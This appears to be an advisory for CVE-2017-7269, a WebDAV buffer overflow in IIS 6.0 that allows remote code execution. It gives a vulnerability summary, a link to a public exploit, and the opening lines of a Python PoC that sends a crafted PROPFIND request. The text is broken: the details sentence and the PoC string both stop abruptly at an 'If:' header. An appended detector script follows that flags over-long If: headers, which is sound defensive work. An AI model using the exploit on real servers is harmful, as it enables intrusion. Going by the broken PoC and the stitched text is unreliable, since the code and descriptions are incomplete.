IIS 6.0 Remote Code Execution 0day, CVE-2017-7269 (with PoC)
Vulnerability description
Vulnerability ID: CVE-2017-7269
Discovered by: Zhiniang Peng and Chen Wu (Information Security Lab, School of Computer Science & Engineering, South China University of Technology)
Summary: IIS 6.0 with the WebDAV service enabled has a buffer overflow vulnerability that leads to remote code execution. It can currently be exploited reliably against Windows Server 2003 R2; the vulnerability was first exploited in the wild around July-August 2016.
Vulnerability type: buffer overflow
Severity: high
Affected product: IIS 6.0 with the WebDAV service enabled on Microsoft Windows Server 2003 R2 (verified so far; other versions not yet verified)
Triggering function: ScStoragePathFromUrl
Additional information: ScStoragePathFromUrl is called twice
Details: the ScStoragePathFromUrl function in the WebDAV service of IIS 6.0 on Windows Server 2003 has a buffer overflow vulnerability; an attacker, via one beginning with “If:
PoC (from the web: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py)
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If:
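A defender-side check, added here as an example and not part of the original advisory or of the PoC above: it parses raw HTTP requests and flags WebDAV PROPFIND requests whose "If:" header (the header the advisory names as the trigger) is abnormally long. The length threshold and the sample requests are assumptions constructed for illustration, not values from the advisory.

```python
# Added detection example (not from the advisory or its PoC): flag PROPFIND
# requests carrying an over-long "If:" header. Legitimate If: headers hold
# short lock tokens / ETags, so a very long one is worth alerting on.
MAX_IF_HEADER_LEN = 256  # assumed threshold; tune for your environment


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, target, headers).
    Header names are lowercased str; values stay raw bytes. Body is ignored."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        return None  # malformed request line
    method = parts[0].decode("latin-1")
    target = parts[1].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            continue  # not a header line
        headers[name.strip().lower().decode("latin-1")] = value.strip()
    return method, target, headers


def suspicious_if_header(raw: bytes, max_len: int = MAX_IF_HEADER_LEN) -> bool:
    """True when the request is a PROPFIND whose If: header exceeds max_len."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, _, headers = parsed
    if method != "PROPFIND" or "if" not in headers:
        return False
    return len(headers["if"]) > max_len


# Constructed sample requests for a local check (not captured traffic).
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: localhost\r\n"
          b"If: <http://localhost/docs/> (<opaquelocktoken:abc>)\r\n"
          b"Content-Length: 0\r\n\r\n")
OVERLONG = (b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
            b"If: <http://localhost/" + b"A" * 1000 + b">\r\n\r\n")

if __name__ == "__main__":
    print("benign:", suspicious_if_header(BENIGN))     # False
    print("overlong:", suspicious_if_header(OVERLONG))  # True
```

The same check can be run over request logs or a proxy capture; only PROPFIND requests are considered, so non-WebDAV traffic with a long header is not flagged.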